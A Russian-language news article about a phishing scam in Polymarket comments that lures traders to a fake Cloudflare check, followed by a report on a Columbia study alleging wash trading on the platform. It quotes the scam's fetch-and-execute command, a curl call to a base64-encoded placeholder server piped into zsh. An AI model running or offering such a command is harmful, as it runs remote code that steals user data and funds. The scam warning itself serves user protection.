Фишинговые ссылки на частных рынках Polymarket: пользователи бьют тревогу

Polymarket снова в центре внимания, на этот раз потому, что один из его ведущих трейдеров, известный под ником «25usdc», забил тревогу по поводу схемы, использующей раздел комментариев платформы для обмана ничего не подозревающих пользователей. 

Это происходит в критически важный для платформы Polymarket момент, поскольку она готовится к возвращению на рынок США и изо всех сил пытается опередить таких конкурентов, как Kalshi. 

Торговцы Polymarket находятся в состоянии повышенной готовности 

По данным 25usdc, хакеры используют раздел комментариев на Polymarket для мошеннических схем, и на данный момент пользователи потеряли более 500 000 долларов.

«Они говорят: „Почему вы не торгуете на частных рынках Polymarket? Там всегда гораздо больше шансов на успех!“», — написал 25usdc, прежде чем объяснить, как работает вся эта афера. 

По его словам, всё начинается с того, что они покупают акции как с пометкой «Да», так и с пометкой «Нет» на рынке с двух разных аккаунтов. Таким образом, их комментарии остаются доступными, даже когда включен фильтр «Держатели». После этого они размещают URL-адрес своего сайта в зашифрованном виде.

URL-адрес ведет ничего не подозревающего пользователя на страницу с аккуратным внешним видом и логотипом Polymarket, где запрашивается авторизация по электронной почте. После подтверждения адреса электронной почты появляется новое окно, в котором пользователю предлагается подтвердить свою активность, имитируя CloudFlare. 

Однако, согласно 25usdc, при нажатии кнопки «Копировать» копируется команда, которая выглядит примерно так: «curl -kfsSL $(echo 'ENCODED_STRING=='|base64 -d)|zsh», и первое, что она делает, если пользователь по ошибке вставляет её в свой терминал, — это декодирует строку, закодированную в base64 (URL-адрес сервера), после чего получает скрипт с этого сервера и немедленно его выполняет. 

Сообщается, что рассматриваемый скрипт может содержать что угодно, и, по всей видимости, никакого всплывающего предупреждения не будет, после чего ущерб уже будет нанесен, и единственным выходом, по мнению 25usdc, может стать отключение Wi-Fi. 

«В конечном итоге они собирают данные, записывают всё, что происходит в вашей системе, и отправляют архив в формате ZIP на свой сервер», — написала организация 25usdc. «Затем они используют эти данные для входа в ваши учетные записи и кражи ваших денег»

Среди прочего он заметил, насколько тщательно действует эта группа; например, они заметают следы, часто меняя кошельки, используют маскировку на каждом этапе и даже отключают сервер, который отправляет полезные нагрузки и получает регистрируемые данные, когда нет активной жертвы.

«Я думаю, лучший способ решить эту проблему — позволить доверенным пользователям просматривать комментарии или ввести систему отрицательных оценок, которая скрывает сообщения с большим количеством минусов», — заключил 25usdc, отметив при этом, что простого предупреждения, которое сейчас отображает Polymarket, будет недостаточно. 

Внимание: на сайте Polymarket, предлагающем «частные ставки», нет «лучших шансов»

Никогда не вводите свой адрес электронной почты Polymarket или код подтверждения для входа в систему ни на каком другом сайте, кроме нашего официального сайта.

— Polymarket Traders (@PolymarketTrade) 9 ноября 2025 г.

Новое исследование утверждает, что объемы продаж Polymarket поддерживаются за счет фиктивных сделок

Как Cryptopolitan сообщало издание, в недавно опубликованном исследовании ученых из Колумбийского университета утверждается, что объем активности на Polymarket был значительно завышен за счет фиктивных сделок. 

«Искусственная торговля», как её назвали авторы, менялась со временем, но, по их словам, в среднем за последние три года на неё приходилось 25% всех операций купли-продажи на Polymarket. 

Статья еще не прошла рецензирование, но уже опубликована на платформе открытого доступа к научным исследованиям SSRN и находится на рассмотрении в Polymarket. 

Следует уточнить, что авторы не выдвигают прямого обвинения в адрес Polymarket в совершении фиктивных сделок. Однако они выделили элементы криптовалютной структуры биржи, которые делают это утверждение правдоподобным.  

Они также предположили, что клиенты компании моглиdentучаствовать в так называемых «фиктивных сделках», пытаясь повысить свои шансы на получение доступа к собственному цифровому токену, о возможности запуска которого основатель компании, Шейн Коплан, намекал еще 8 октября. 

«Я надеюсь, что Polymarket положительно воспримет анализ, представленный в нашей статье», — написал в электронном письме Яш Канория, профессор бизнес-школы Колумбийского университета и один из четырех соавторов статьи. «Фальшивые сделки не добавляют ликвидности или информации на рынок, поэтому представляется целесообразным различать подлинный и поддельный объем»

Если часть прогнозов Polymarket действительно является «фиктивной», то, как утверждается в исследовании, это может изменить представление об относительной силе Polymarket в отрасли, а также подорвать существующее представление о том, что рынки прогнозов отражают «мудрость более широкой аудитории»

«Потенциал для крупномасштабных фиктивных сделок означает, что объем может быть ненадежным показателем подлинной активности платформы, особенно на криптовалютных биржах, которые могут не иметь надлежащих мер защиты», — заключили авторы.